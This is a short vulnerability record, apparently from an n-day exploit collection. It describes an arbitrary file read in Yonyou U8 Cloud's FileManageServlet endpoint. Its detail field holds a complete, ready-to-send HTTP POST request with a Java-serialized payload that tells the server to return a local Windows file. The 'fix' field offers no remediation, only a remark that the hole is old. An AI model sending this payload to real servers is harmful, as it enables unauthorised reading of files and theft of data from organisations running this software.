vendor = "用友"
name = "用友U8 Cloud FileManageServlet存在任意文件读取"
type = "权限绕过"
version = "未知"
path = "/service/FileManageServlet"
detail = "POST /service/FileManageServlet HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/octet-stream {{unquote(\"\\xac\\xed\\x00\\x05sr\\x00\\x11java.util.HashMap\\x05\\x07\\xda\\xc1\\xc3\\x16`\\xd1\\x03\\x00\\x02F\\x00\\x0aloadFactorI\\x00\\x09thresholdxp?@\\x00\\x00\\x00\\x00\\x00\\x0cw\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x03t\\x00\\x04patht\\x00\\x12C:\\\\Windows\\\\win.init\\x00\\x06dsNamet\\x00\\x03plmt\\x00\\x08operTypet\\x00\\x0ddownloadlocalx\")}}"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
